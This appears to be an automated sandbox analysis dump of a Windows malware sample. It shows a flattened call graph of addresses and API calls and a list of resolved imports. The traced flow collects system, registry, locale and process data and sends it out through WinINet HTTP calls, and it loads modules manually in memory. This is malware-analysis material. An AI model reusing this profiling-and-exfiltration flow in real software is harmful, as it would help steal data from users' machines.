55a9b0 4 API calls 14921->14922 14923 545c1f 14922->14923 14924 55a8a0 lstrcpy 14923->14924 14925 545c28 14924->14925 14926 55a920 3 API calls 14925->14926 14927 545c46 14926->14927 14928 55a8a0 lstrcpy 14927->14928 14929 545c4f 14928->14929 14930 55a9b0 4 API calls 14929->14930 14931 545c6e 14930->14931 14932 55a8a0 lstrcpy 14931->14932 14933 545c77 14932->14933 14934 55a9b0 4 API calls 14933->14934 14935 545c98 14934->14935 14936 55a8a0 lstrcpy 14935->14936 14937 545ca1 14936->14937 14938 55a9b0 4 API calls 14937->14938 14939 545cc1 14938->14939 14940 55a8a0 lstrcpy 14939->14940 14941 545cca 14940->14941 14942 55a9b0 4 API calls 14941->14942 14943 545ce9 14942->14943 14944 55a8a0 lstrcpy 14943->14944 14945 545cf2 14944->14945 14946 55a920 3 API calls 14945->14946 14947 545d10 14946->14947 14948 55a8a0 lstrcpy 14947->14948 14949 545d19 14948->14949 14950 55a9b0 4 API calls 14949->14950 14951 545d38 14950->14951 14952 55a8a0 lstrcpy 14951->14952 14953 545d41 14952->14953 14954 55a9b0 4 API calls 14953->14954 14955 545d60 14954->14955 14956 55a8a0 lstrcpy 14955->14956 14957 545d69 14956->14957 14958 55a920 3 API calls 14957->14958 14959 545d87 14958->14959 14960 55a8a0 lstrcpy 14959->14960 14961 545d90 14960->14961 14962 55a9b0 4 API calls 14961->14962 14963 545daf 14962->14963 14964 55a8a0 lstrcpy 14963->14964 14965 545db8 14964->14965 14966 55a9b0 4 API calls 14965->14966 14967 545dd9 14966->14967 14968 55a8a0 lstrcpy 14967->14968 14969 545de2 14968->14969 14970 55a9b0 4 API calls 14969->14970 14971 545e02 14970->14971 14972 55a8a0 lstrcpy 14971->14972 14973 545e0b 14972->14973 14974 55a9b0 4 API calls 14973->14974 14975 545e2a 14974->14975 14976 55a8a0 lstrcpy 14975->14976 14977 545e33 14976->14977 14978 55a920 3 API calls 14977->14978 14979 545e54 14978->14979 14980 55a8a0 lstrcpy 14979->14980 14981 545e5d 14980->14981 14982 545e70 lstrlen 14981->14982 15776 55aad0 14982->15776 14984 545e81 lstrlen GetProcessHeap RtlAllocateHeap 15777 55aad0 14984->15777 14986 545eae lstrlen 14987 545ebe 14986->14987 14988 545ed7 lstrlen 14987->14988 14989 545ee7 14988->14989 14990 545ef0 lstrlen 14989->14990 14991 545f03 14990->14991 14992 545f1a lstrlen 14991->14992 15778 55aad0 14992->15778 14994 545f2a HttpSendRequestA 14995 545f35 InternetReadFile 14994->14995 14996 545f6a InternetCloseHandle 14995->14996 15000 545f61 14995->15000 14996->14920 14998 55a9b0 4 API calls 14998->15000 14999 55a8a0 lstrcpy 14999->15000 15000->14995 15000->14996 15000->14998 15000->14999 15003 551077 15001->15003 15002 551151 15002->13772 15003->15002 15004 55a820 lstrlen lstrcpy 15003->15004 15004->15003 15006 550db7 15005->15006 15007 550f17 15006->15007 15008 550ea4 StrCmpCA 15006->15008 15009 550e27 StrCmpCA 15006->15009 15010 550e67 StrCmpCA 15006->15010 15011 55a820 lstrlen lstrcpy 15006->15011 15007->13780 15008->15006 15009->15006 15010->15006 15011->15006 15015 550f67 15012->15015 15013 551044 15013->13788 15014 550fb2 StrCmpCA 15014->15015 15015->15013 15015->15014 15016 55a820 lstrlen lstrcpy 15015->15016 15016->15015 15018 55a740 lstrcpy 15017->15018 15019 551a26 15018->15019 15020 55a9b0 4 API calls 15019->15020 15021 551a37 15020->15021 15022 55a8a0 lstrcpy 15021->15022 15023 551a40 15022->15023 15024 55a9b0 4 API calls 15023->15024 15025 551a5b 15024->15025 15026 55a8a0 lstrcpy 15025->15026 15027 551a64 15026->15027 15028 55a9b0 4 API calls 15027->15028 15029 551a7d 15028->15029 15030 55a8a0 lstrcpy 15029->15030 15031 551a86 15030->15031 15032 55a9b0 4 API calls 15031->15032 15033 551aa1 15032->15033 15034 55a8a0 lstrcpy 15033->15034 15035 551aaa 15034->15035 15036 55a9b0 4 API calls 15035->15036 15037 551ac3 15036->15037 15038 55a8a0 lstrcpy 15037->15038 15039 551acc 15038->15039 15040 55a9b0 4 API calls 15039->15040 15041 551ae7 15040->15041 15042 55a8a0 lstrcpy 15041->15042 15043 551af0 15042->15043 15044 55a9b0 4 API calls 15043->15044 15045 551b09 15044->15045 15046 55a8a0 lstrcpy 15045->15046 15047 551b12 15046->15047 15048 55a9b0 4 API calls 15047->15048 15049 551b2d 15048->15049 15050 55a8a0 lstrcpy 15049->15050 15051 551b36 15050->15051 15052 55a9b0 4 API calls 15051->15052 15053 551b4f 15052->15053 15054 55a8a0 lstrcpy 15053->15054 15055 551b58 15054->15055 15056 55a9b0 4 API calls 15055->15056 15057 551b76 15056->15057 15058 55a8a0 lstrcpy 15057->15058 15059 551b7f 15058->15059 15060 557500 6 API calls 15059->15060 15061 551b96 15060->15061 15062 55a920 3 API calls 15061->15062 15063 551ba9 15062->15063 15064 55a8a0 lstrcpy 15063->15064 15065 551bb2 15064->15065 15066 55a9b0 4 API calls 15065->15066 15067 551bdc 15066->15067 15068 55a8a0 lstrcpy 15067->15068 15069 551be5 15068->15069 15070 55a9b0 4 API calls 15069->15070 15071 551c05 15070->15071 15072 55a8a0 lstrcpy 15071->15072 15073 551c0e 15072->15073 15779 557690 GetProcessHeap RtlAllocateHeap 15073->15779 15076 55a9b0 4 API calls 15077 551c2e 15076->15077 15078 55a8a0 lstrcpy 15077->15078 15079 551c37 15078->15079 15080 55a9b0 4 API calls 15079->15080 15081 551c56 15080->15081 15082 55a8a0 lstrcpy 15081->15082 15083 551c5f 15082->15083 15084 55a9b0 4 API calls 15083->15084 15085 551c80 15084->15085 15086 55a8a0 lstrcpy 15085->15086 15087 551c89 15086->15087 15786 5577c0 GetCurrentProcess IsWow64Process 15087->15786 15090 55a9b0 4 API calls 15091 551ca9 15090->15091 15092 55a8a0 lstrcpy 15091->15092 15093 551cb2 15092->15093 15094 55a9b0 4 API calls 15093->15094 15095 551cd1 15094->15095 15096 55a8a0 lstrcpy 15095->15096 15097 551cda 15096->15097 15098 55a9b0 4 API calls 15097->15098 15099 551cfb 15098->15099 15100 55a8a0 lstrcpy 15099->15100 15101 551d04 15100->15101 15102 557850 3 API calls 15101->15102 15103 551d14 15102->15103 15104 55a9b0 4 API calls 15103->15104 15105 551d24 15104->15105 15106 55a8a0 lstrcpy 15105->15106 15107 551d2d 15106->15107 15108 55a9b0 4 API calls 15107->15108 15109 551d4c 15108->15109 15110 55a8a0 lstrcpy 15109->15110 15111 551d55 15110->15111 15112 55a9b0 4 API calls 15111->15112 15113 551d75 15112->15113 15114 55a8a0 lstrcpy 15113->15114 15115 551d7e 15114->15115 15116 5578e0 3 API calls 15115->15116 15117 551d8e 15116->15117 15118 55a9b0 4 API calls 15117->15118 15119 551d9e 15118->15119 15120 55a8a0 lstrcpy 15119->15120 15121 551da7 15120->15121 15122 55a9b0 4 API calls 15121->15122 15123 551dc6 15122->15123 15124 55a8a0 lstrcpy 15123->15124 15125 551dcf 15124->15125 15126 55a9b0 4 API calls 15125->15126 15127 551df0 15126->15127 15128 55a8a0 lstrcpy 15127->15128 15129 551df9 15128->15129 15788 557980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15129->15788 15132 55a9b0 4 API calls 15133 551e19 15132->15133 15134 55a8a0 lstrcpy 15133->15134 15135 551e22 15134->15135 15136 55a9b0 4 API calls 15135->15136 15137 551e41 15136->15137 15138 55a8a0 lstrcpy 15137->15138 15139 551e4a 15138->15139 15140 55a9b0 4 API calls 15139->15140 15141 551e6b 15140->15141 15142 55a8a0 lstrcpy 15141->15142 15143 551e74 15142->15143 15790 557a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15143->15790 15146 55a9b0 4 API calls 15147 551e94 15146->15147 15148 55a8a0 lstrcpy 15147->15148 15149 551e9d 15148->15149 15150 55a9b0 4 API calls 15149->15150 15151 551ebc 15150->15151 15152 55a8a0 lstrcpy 15151->15152 15153 551ec5 15152->15153 15154 55a9b0 4 API calls 15153->15154 15155 551ee5 15154->15155 15156 55a8a0 lstrcpy 15155->15156 15157 551eee 15156->15157 15793 557b00 GetUserDefaultLocaleName 15157->15793 15160 55a9b0 4 API calls 15161 551f0e 15160->15161 15162 55a8a0 lstrcpy 15161->15162 15163 551f17 15162->15163 15164 55a9b0 4 API calls 15163->15164 15165 551f36 15164->15165 15166 55a8a0 lstrcpy 15165->15166 15167 551f3f 15166->15167 15168 55a9b0 4 API calls 15167->15168 15169 551f60 15168->15169 15170 55a8a0 lstrcpy 15169->15170 15171 551f69 15170->15171 15797 557b90 15171->15797 15173 551f80 15174 55a920 3 API calls 15173->15174 15175 551f93 15174->15175 15176 55a8a0 lstrcpy 15175->15176 15177 551f9c 15176->15177 15178 55a9b0 4 API calls 15177->15178 15179 551fc6 15178->15179 15180 55a8a0 lstrcpy 15179->15180 15181 551fcf 15180->15181 15182 55a9b0 4 API calls 15181->15182 15183 551fef 15182->15183 15184 55a8a0 lstrcpy 15183->15184 15185 551ff8 15184->15185 15809 557d80 GetSystemPowerStatus 15185->15809 15188 55a9b0 4 API calls 15189 552018 15188->15189 15190 55a8a0 lstrcpy 15189->15190 15191 552021 15190->15191 15192 55a9b0 4 API calls 15191->15192 15193 552040 15192->15193 15194 55a8a0 lstrcpy 15193->15194 15195 552049 15194->15195 15196 55a9b0 4 API calls 15195->15196 15197 55206a 15196->15197 15198 55a8a0 lstrcpy 15197->15198 15199 552073 15198->15199 15200 55207e GetCurrentProcessId 15199->15200 15811 559470 OpenProcess 15200->15811 15203 55a920 3 API calls 15204 5520a4 15203->15204 15205 55a8a0 lstrcpy 15204->15205 15206 5520ad 15205->15206 15207 55a9b0 4 API calls 15206->15207 15208 5520d7 15207->15208 15209 55a8a0 lstrcpy 15208->15209 15210 5520e0 15209->15210 15211 55a9b0 4 API calls 15210->15211 15212 552100 15211->15212 15213 55a8a0 lstrcpy 15212->15213 15214 552109 15213->15214 15816 557e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15214->15816 15217 55a9b0 4 API calls 15218 552129 15217->15218 15219 55a8a0 lstrcpy 15218->15219 15220 552132 15219->15220 15221 55a9b0 4 API calls 15220->15221 15222 552151 15221->15222 15223 55a8a0 lstrcpy 15222->15223 15224 55215a 15223->15224 15225 55a9b0 4 API calls 15224->15225 15226 55217b 15225->15226 15227 55a8a0 lstrcpy 15226->15227 15228 552184 15227->15228 15820 557f60 15228->15820 15231 55a9b0 4 API calls 15232 5521a4 15231->15232 15233 55a8a0 lstrcpy 15232->15233 15234 5521ad 15233->15234 15235 55a9b0 4 API calls 15234->15235 15236 5521cc 15235->15236 15237 55a8a0 lstrcpy 15236->15237 15238 5521d5 15237->15238 15239 55a9b0 4 API calls 15238->15239 15240 5521f6 15239->15240 15241 55a8a0 lstrcpy 15240->15241 15242 5521ff 15241->15242 15833 557ed0 GetSystemInfo wsprintfA 15242->15833 15245 55a9b0 4 API calls 15246 55221f 15245->15246 15247 55a8a0 lstrcpy 15246->15247 15248 552228 15247->15248 15249 55a9b0 4 API calls 15248->15249 15250 552247 15249->15250 15251 55a8a0 lstrcpy 15250->15251 15252 552250 15251->15252 15253 55a9b0 4 API calls 15252->15253 15254 552270 15253->15254 15255 55a8a0 lstrcpy 15254->15255 15256 552279 15255->15256 15835 558100 GetProcessHeap RtlAllocateHeap 15256->15835 15259 55a9b0 4 API calls 15260 552299 15259->15260 15261 55a8a0 lstrcpy 15260->15261 15262 5522a2 15261->15262 15263 55a9b0 4 API calls 15262->15263 15264 5522c1 15263->15264 15265 55a8a0 lstrcpy 15264->15265 15266 5522ca 15265->15266 15267 55a9b0 4 API calls 15266->15267 15268 5522eb 15267->15268 15269 55a8a0 lstrcpy 15268->15269 15270 5522f4 15269->15270 15841 5587c0 15270->15841 15273 55a920 3 API calls 15274 55231e 15273->15274 15275 55a8a0 lstrcpy 15274->15275 15276 552327 15275->15276 15277 55a9b0 4 API calls 15276->15277 15278 552351 15277->15278 15279 55a8a0 lstrcpy 15278->15279 15280 55235a 15279->15280 15281 55a9b0 4 API calls 15280->15281 15282 55237a 15281->15282 15283 55a8a0 lstrcpy 15282->15283 15284 552383 15283->15284 15285 55a9b0 4 API calls 15284->15285 15286 5523a2 15285->15286 15287 55a8a0 lstrcpy 15286->15287 15288 5523ab 15287->15288 15846 5581f0 15288->15846 15290 5523c2 15291 55a920 3 API calls 15290->15291 15292 5523d5 15291->15292 15293 55a8a0 lstrcpy 15292->15293 15294 5523de 15293->15294 15295 55a9b0 4 API calls 15294->15295 15296 55240a 15295->15296 15297 55a8a0 lstrcpy 15296->15297 15298 552413 15297->15298 15299 55a9b0 4 API calls 15298->15299 15300 552432 15299->15300 15301 55a8a0 lstrcpy 15300->15301 15302 55243b 15301->15302 15303 55a9b0 4 API calls 15302->15303 15304 55245c 15303->15304 15305 55a8a0 lstrcpy 15304->15305 15306 552465 15305->15306 15307 55a9b0 4 API calls 15306->15307 15308 552484 15307->15308 15309 55a8a0 lstrcpy 15308->15309 15310 55248d 15309->15310 15311 55a9b0 4 API calls 15310->15311 15312 5524ae 15311->15312 15313 55a8a0 lstrcpy 15312->15313 15314 5524b7 15313->15314 15854 558320 15314->15854 15316 5524d3 15317 55a920 3 API calls 15316->15317 15318 5524e6 15317->15318 15319 55a8a0 lstrcpy 15318->15319 15320 5524ef 15319->15320 15321 55a9b0 4 API calls 15320->15321 15322 552519 15321->15322 15323 55a8a0 lstrcpy 15322->15323 15324 552522 15323->15324 15325 55a9b0 4 API calls 15324->15325 15326 552543 15325->15326 15327 55a8a0 lstrcpy 15326->15327 15328 55254c 15327->15328 15329 558320 17 API calls 15328->15329 15330 552568 15329->15330 15331 55a920 3 API calls 15330->15331 15332 55257b 15331->15332 15333 55a8a0 lstrcpy 15332->15333 15334 552584 15333->15334 15335 55a9b0 4 API calls 15334->15335 15336 5525ae 15335->15336 15337 55a8a0 lstrcpy 15336->15337 15338 5525b7 15337->15338 15339 55a9b0 4 API calls 15338->15339 15340 5525d6 15339->15340 15341 55a8a0 lstrcpy 15340->15341 15342 5525df 15341->15342 15343 55a9b0 4 API calls 15342->15343 15344 552600 15343->15344 15345 55a8a0 lstrcpy 15344->15345 15346 552609 15345->15346 15890 558680 15346->15890 15348 552620 15349 55a920 3 API calls 15348->15349 15350 552633 15349->15350 15351 55a8a0 lstrcpy 15350->15351 15352 55263c 15351->15352 15353 55265a lstrlen 15352->15353 15354 55266a 15353->15354 15355 55a740 lstrcpy 15354->15355 15356 55267c 15355->15356 15357 541590 lstrcpy 15356->15357 15358 55268d 15357->15358 15900 555190 15358->15900 15360 552699 15360->13792 16088 55aad0 15361->16088 15363 545009 InternetOpenUrlA 15367 545021 15363->15367 15364 5450a0 InternetCloseHandle InternetCloseHandle 15366 5450ec 15364->15366 15365 54502a InternetReadFile 15365->15367 15366->13796 15367->15364 15367->15365 16089 5498d0 15368->16089 15370 550759 15371 55077d 15370->15371 15372 550a38 15370->15372 15375 550799 StrCmpCA 15371->15375 15373 541590 lstrcpy 15372->15373 15374 550a49 15373->15374 16265 550250 15374->16265 15377 550843 15375->15377 15378 5507a8 15375->15378 15382 550865 StrCmpCA 15377->15382 15380 55a7a0 lstrcpy 15378->15380 15381 5507c3 15380->15381 15383 541590 lstrcpy 15381->15383 15384 550874 15382->15384 15420 55096b 15382->15420 15385 55080c 15383->15385 15386 55a740 lstrcpy 15384->15386 15387 55a7a0 lstrcpy 15385->15387 15389 550881 15386->15389 15390 550823 15387->15390 15388 55099c StrCmpCA 15391 550a2d 15388->15391 15392 5509ab 15388->15392 15393 55a9b0 4 API calls 15389->15393 15395 55a7a0 lstrcpy 15390->15395 15391->13800 15396 541590 lstrcpy 15392->15396 15394 5508ac 15393->15394 15397 55a920 3 API calls 15394->15397 15398 55083e 15395->15398 15399 5509f4 15396->15399 15401 5508b3 15397->15401 16092 54fb00 15398->16092 15400 55a7a0 lstrcpy 15399->15400 15403 550a0d 15400->15403 15404 55a9b0 4 API calls 15401->15404 15405 55a7a0 lstrcpy 15403->15405 15406 5508ba 15404->15406 15407 550a28 15405->15407 15420->15388 15740 55a7a0 lstrcpy 15739->15740 15741 541683 15740->15741 15742 55a7a0 lstrcpy 15741->15742 15743 541695 15742->15743 15744 55a7a0 lstrcpy 15743->15744 15745 5416a7 15744->15745 15746 55a7a0 lstrcpy 15745->15746 15747 5415a3 15746->15747 15747->14623 15749 5447c6 15748->15749 15750 544838 lstrlen 15749->15750 15774 55aad0 15750->15774 15752 544848 InternetCrackUrlA 15753 544867 15752->15753 15753->14700 15755 55a740 lstrcpy 15754->15755 15756 558b74 15755->15756 15757 55a740 lstrcpy 15756->15757 15758 558b82 GetSystemTime 15757->15758 15760 558b99 15758->15760 15759 55a7a0 lstrcpy 15761 558bfc 15759->15761 15760->15759 15761->14715 15764 55a931 15762->15764 15763 55a988 15765 55a7a0 lstrcpy 15763->15765 15764->15763 15766 55a968 lstrcpy lstrcat 15764->15766 15767 55a994 15765->15767 15766->15763 15767->14718 15768->14833 15770 549af9 LocalAlloc 15769->15770 15771 544eee 15769->15771 15770->15771 15772 549b14 CryptStringToBinaryA 15770->15772 15771->14721 15771->14723 15772->15771 15773 549b39 LocalFree 15772->15773 15773->15771 15774->15752 15775->14843 15776->14984 15777->14986 15778->14994 15907 5577a0 15779->15907 15782 5576c6 RegOpenKeyExA 15784 557704 RegCloseKey 15782->15784 15785 5576e7 RegQueryValueExA 15782->15785 15783 551c1e 15783->15076 15784->15783 15785->15784 15787 551c99 15786->15787 15787->15090 15789 551e09 15788->15789 15789->15132 15791 551e84 15790->15791 15792 557a9a wsprintfA 15790->15792 15791->15146 15792->15791 15794 551efe 15793->15794 15795 557b4d 15793->15795 15794->15160 15914 558d20 LocalAlloc CharToOemW 15795->15914 15798 55a740 lstrcpy 15797->15798 15799 557bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15798->15799 15808 557c25 15799->15808 15800 557c46 GetLocaleInfoA 15800->15808 15801 557d18 15802 557d1e LocalFree 15801->15802 15803 557d28 15801->15803 15802->15803 15805 55a7a0 lstrcpy 15803->15805 15804 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15804->15808 15807 557d37 15805->15807 15806 55a8a0 lstrcpy 15806->15808 15807->15173 15808->15800 15808->15801 15808->15804 15808->15806 15810 552008 15809->15810 15810->15188 15812 5594b5 15811->15812 15813 559493 GetModuleFileNameExA CloseHandle 15811->15813 15814 55a740 lstrcpy 15812->15814 15813->15812 15815 552091 15814->15815 15815->15203 15817 552119 15816->15817 15818 557e68 RegQueryValueExA 15816->15818 15817->15217 15819 557e8e RegCloseKey 15818->15819 15819->15817 15821 557fb9 GetLogicalProcessorInformationEx 15820->15821 15822 557fd8 GetLastError 15821->15822 15827 558029 15821->15827 15823 558022 15822->15823 15832 557fe3 15822->15832 15825 552194 15823->15825 15829 5589f0 2 API calls 15823->15829 15825->15231 15828 5589f0 2 API calls 15827->15828 15830 55807b 15828->15830 15829->15825 15830->15823 15831 558084 wsprintfA 15830->15831 15831->15825 15832->15821 15832->15825 15915 5589f0 15832->15915 15918 558a10 GetProcessHeap RtlAllocateHeap 15832->15918 15834 55220f 15833->15834 15834->15245 15836 5589b0 15835->15836 15837 55814d GlobalMemoryStatusEx 15836->15837 15840 558163 __aulldiv 15837->15840 15838 55819b wsprintfA 15839 552289 15838->15839 15839->15259 15840->15838 15842 5587fb GetProcessHeap RtlAllocateHeap wsprintfA 15841->15842 15844 55a740 lstrcpy 15842->15844 15845 55230b 15844->15845 15845->15273 15847 55a740 lstrcpy 15846->15847 15853 558229 15847->15853 15848 558263 15849 55a7a0 lstrcpy 15848->15849 15851 5582dc 15849->15851 15850 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15850->15853 15851->15290 15852 55a8a0 lstrcpy 15852->15853 15853->15848 15853->15850 15853->15852 15855 55a740 lstrcpy 15854->15855 15856 55835c RegOpenKeyExA 15855->15856 15857 5583d0 15856->15857 15858 5583ae 15856->15858 15860 558613 RegCloseKey 15857->15860 15861 5583f8 RegEnumKeyExA 15857->15861 15859 55a7a0 lstrcpy 15858->15859 15871 5583bd 15859->15871 15864 55a7a0 lstrcpy 15860->15864 15862 55843f wsprintfA RegOpenKeyExA 15861->15862 15863 55860e 15861->15863 15865 558485 RegCloseKey RegCloseKey 15862->15865 15866 5584c1 RegQueryValueExA 15862->15866 15863->15860 15864->15871 15869 55a7a0 lstrcpy 15865->15869 15867 558601 RegCloseKey 15866->15867 15868 5584fa lstrlen 15866->15868 15867->15863 15868->15867 15870 558510 15868->15870 15869->15871 15872 55a9b0 4 API calls 15870->15872 15871->15316 15873 558527 15872->15873 15874 55a8a0 lstrcpy 15873->15874 15875 558533 15874->15875 15876 55a9b0 4 API calls 15875->15876 15877 558557 15876->15877 15878 55a8a0 lstrcpy 15877->15878 15879 558563 15878->15879 15880 55856e RegQueryValueExA 15879->15880 15880->15867 15881 5585a3 15880->15881 15882 55a9b0 4 API calls 15881->15882 15883 5585ba 15882->15883 15884 55a8a0 lstrcpy 15883->15884 15885 5585c6 15884->15885 15886 55a9b0 4 API calls 15885->15886 15887 5585ea 15886->15887 15888 55a8a0 lstrcpy 15887->15888 15889 5585f6 15888->15889 15889->15867 15891 55a740 lstrcpy 15890->15891 15892 5586bc CreateToolhelp32Snapshot Process32First 15891->15892 15893 55875d CloseHandle 15892->15893 15894 5586e8 Process32Next 15892->15894 15895 55a7a0 lstrcpy 15893->15895 15894->15893 15899 5586fd 15894->15899 15896 558776 15895->15896 15896->15348 15897 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15897->15899 15898 55a8a0 lstrcpy 15898->15899 15899->15894 15899->15897 15899->15898 15901 55a7a0 lstrcpy 15900->15901 15902 5551b5 15901->15902 15903 541590 lstrcpy 15902->15903 15904 5551c6 15903->15904 15919 545100 15904->15919 15906 5551cf 15906->15360 15910 557720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15907->15910 15909 5576b9 15909->15782 15909->15783 15911 557765 RegQueryValueExA 15910->15911 15912 557780 RegCloseKey 15910->15912 15911->15912 15913 557793 15912->15913 15913->15909 15914->15794 15916 558a0c 15915->15916 15917 5589f9 GetProcessHeap HeapFree 15915->15917 15916->15832 15917->15916 15918->15832 15920 55a7a0 lstrcpy 15919->15920 15921 545119 15920->15921 15922 5447b0 2 API calls 15921->15922 15923 545125 15922->15923 16079 558ea0 15923->16079 15925 545184 15926 545192 lstrlen 15925->15926 15927 5451a5 15926->15927 15928 558ea0 4 API calls 15927->15928 15929 5451b6 15928->15929 15930 55a740 lstrcpy 15929->15930 15931 5451c9 15930->15931 15932 55a740 lstrcpy 15931->15932 15933 5451d6 15932->15933 15934 55a740 lstrcpy 15933->15934 15935 5451e3 15934->15935 15936 55a740 lstrcpy 15935->15936 15937 5451f0 15936->15937 15938 55a740 lstrcpy 15937->15938 15939 5451fd InternetOpenA StrCmpCA 15938->15939 15940 54522f 15939->15940 15941 5458c4 InternetCloseHandle 15940->15941 15942 558b60 3 API calls 15940->15942 15948 5458d9 codecvt 15941->15948 15943 54524e 15942->15943 15944 55a920 3 API calls 15943->15944 15945 545261 15944->15945 15946 55a8a0 lstrcpy 15945->15946 15947 54526a 15946->15947 15949 55a9b0 4 API calls 15947->15949 15952 55a7a0 lstrcpy 15948->15952 15950 5452ab 15949->15950 15951 55a920 3 API calls 15950->15951 15953 5452b2 15951->15953 15960 545913 15952->15960 15954 55a9b0 4 API calls 15953->15954 15955 5452b9 15954->15955 15956 55a8a0 lstrcpy 15955->15956 15957 5452c2 15956->15957 15958 55a9b0 4 API calls 15957->15958 15959 545303 15958->15959 15961 55a920 3 API calls 15959->15961 15960->15906 15962 54530a 15961->15962 15963 55a8a0 lstrcpy 15962->15963 15964 545313 15963->15964 15965 545329 InternetConnectA 15964->15965 15965->15941 15966 545359 HttpOpenRequestA 15965->15966 15968 5458b7 InternetCloseHandle 15966->15968 15969 5453b7 15966->15969 15968->15941 15970 55a9b0 4 API calls 15969->15970 15971 5453cb 15970->15971 15972 55a8a0 lstrcpy 15971->15972 15973 5453d4 15972->15973 15974 55a920 3 API calls 15973->15974 15975 5453f2 15974->15975 15976 55a8a0 lstrcpy 15975->15976 15977 5453fb 15976->15977 15978 55a9b0 4 API calls 15977->15978 15979 54541a 15978->15979 15980 55a8a0 lstrcpy 15979->15980 15981 545423 15980->15981 15982 55a9b0 4 API calls 15981->15982 15983 545444 15982->15983 15984 55a8a0 lstrcpy 15983->15984 15985 54544d 15984->15985 15986 55a9b0 4 API calls 15985->15986 15987 54546e 15986->15987 15988 55a8a0 lstrcpy 15987->15988 16080 558ead CryptBinaryToStringA 16079->16080 16084 558ea9 16079->16084 16081 558ece GetProcessHeap RtlAllocateHeap 16080->16081 16080->16084 16082 558ef4 codecvt 16081->16082 16081->16084 16083 558f05 CryptBinaryToStringA 16082->16083 16083->16084 16084->15925 16088->15363 16331 549880 16089->16331 16091 5498e1 16091->15370 16093 55a740 lstrcpy 16092->16093 16094 54fb16 16093->16094 16266 55a740 lstrcpy 16265->16266 16267 550266 16266->16267 16268 558de0 2 API calls 16267->16268 16269 55027b 16268->16269 16270 55a920 3 API calls 16269->16270 16271 55028b 16270->16271 16272 55a8a0 lstrcpy 16271->16272 16273 550294 16272->16273 16274 55a9b0 4 API calls 16273->16274 16275 5502b8 16274->16275 16332 54988e 16331->16332 16335 546fb0 16332->16335 16334 5498ad codecvt 16334->16091 16338 546d40 16335->16338 16339 546d63 16338->16339 16349 546d59 16338->16349 16354 546530 16339->16354 16343 546dbe 16343->16349 16364 5469b0 16343->16364 16345 546e2a 16346 546ee6 VirtualFree 16345->16346 16348 546ef7 16345->16348 16345->16349 16346->16348 16347 546f41 16347->16349 16352 5589f0 2 API calls 16347->16352 16348->16347 16350 546f26 FreeLibrary 16348->16350 16351 546f38 16348->16351 16349->16334 16350->16348 16353 5589f0 2 API calls 16351->16353 16352->16349 16353->16347 16355 546542 16354->16355 16357 546549 16355->16357 16374 558a10 GetProcessHeap RtlAllocateHeap 16355->16374 16357->16349 16358 546660 16357->16358 16363 54668f VirtualAlloc 16358->16363 16360 546730 16361 546743 VirtualAlloc 16360->16361 16362 54673c 16360->16362 16361->16362 16362->16343 16363->16360 16363->16362 16365 5469c9 16364->16365 16369 5469d5 16364->16369 16366 546a09 LoadLibraryA 16365->16366 16365->16369 16367 546a32 16366->16367 16366->16369 16371 546ae0 16367->16371 16375 558a10 GetProcessHeap RtlAllocateHeap 16367->16375 16369->16345 16370 546ba8 GetProcAddress 16370->16369 16370->16371 16371->16369 16371->16370 16372 5589f0 2 API calls 16372->16371 16373 546a8b 16373->16369 16373->16372 16374->16357 16375->16373

                          Executed Functions

                          Function 00559860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 559860-559874 call 559750 663 559a93-559af2 LoadLibraryA * 5 660->663 664 55987a-559a8e call 559780 GetProcAddress * 21 660->664 666 559af4-559b08 GetProcAddress 663->666 667 559b0d-559b14 663->667 664->663 666->667 669 559b46-559b4d 667->669 670 559b16-559b41 GetProcAddress * 2 667->670 671 559b4f-559b63 GetProcAddress 669->671 672 559b68-559b6f 669->672 670->669 671->672 673 559b71-559b84 GetProcAddress 672->673 674 559b89-559b90 672->674 673->674 675 559bc1-559bc2 674->675 676 559b92-559bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(76210000,012316B0), ref: 005598A1
                          • GetProcAddress.KERNEL32(76210000,012315D8), ref: 005598BA
                          • GetProcAddress.KERNEL32(76210000,012314E8), ref: 005598D2
                          • GetProcAddress.KERNEL32(76210000,01231500), ref: 005598EA
                          • GetProcAddress.KERNEL32(76210000,01231560), ref: 00559903
                          • GetProcAddress.KERNEL32(76210000,01238908), ref: 0055991B
                          • GetProcAddress.KERNEL32(76210000,01225628), ref: 00559933
                          • GetProcAddress.KERNEL32(76210000,012255A8), ref: 0055994C
                          • GetProcAddress.KERNEL32(76210000,01231608), ref: 00559964
                          • GetProcAddress.KERNEL32(76210000,012316C8), ref: 0055997C
                          • GetProcAddress.KERNEL32(76210000,01231770), ref: 00559995
                          • GetProcAddress.KERNEL32(76210000,01231758), ref: 005599AD
                          • GetProcAddress.KERNEL32(76210000,01225608), ref: 005599C5
                          • GetProcAddress.KERNEL32(76210000,01231530), ref: 005599DE
                          • GetProcAddress.KERNEL32(76210000,012316E0), ref: 005599F6
                          • GetProcAddress.KERNEL32(76210000,01225648), ref: 00559A0E
                          • GetProcAddress.KERNEL32(76210000,012316F8), ref: 00559A27
                          • GetProcAddress.KERNEL32(76210000,01231578), ref: 00559A3F
                          • GetProcAddress.KERNEL32(76210000,01225448), ref: 00559A57
                          • GetProcAddress.KERNEL32(76210000,01231818), ref: 00559A70
                          • GetProcAddress.KERNEL32(76210000,012254E8), ref: 00559A88
                          • LoadLibraryA.KERNEL32(01231890,?,00556A00), ref: 00559A9A
                          • LoadLibraryA.KERNEL32(01231878,?,00556A00), ref: 00559AAB
                          • LoadLibraryA.KERNEL32(012317E8,?,00556A00), ref: 00559ABD
                          • LoadLibraryA.KERNEL32(01231800,?,00556A00), ref: 00559ACF
                          • LoadLibraryA.KERNEL32(012318A8,?,00556A00), ref: 00559AE0
                          • GetProcAddress.KERNEL32(75B30000,01231830), ref: 00559B02
                          • GetProcAddress.KERNEL32(751E0000,01231848), ref: 00559B23
                          • GetProcAddress.KERNEL32(751E0000,01231860), ref: 00559B3B
                          • GetProcAddress.KERNEL32(76910000,01238E30), ref: 00559B5D
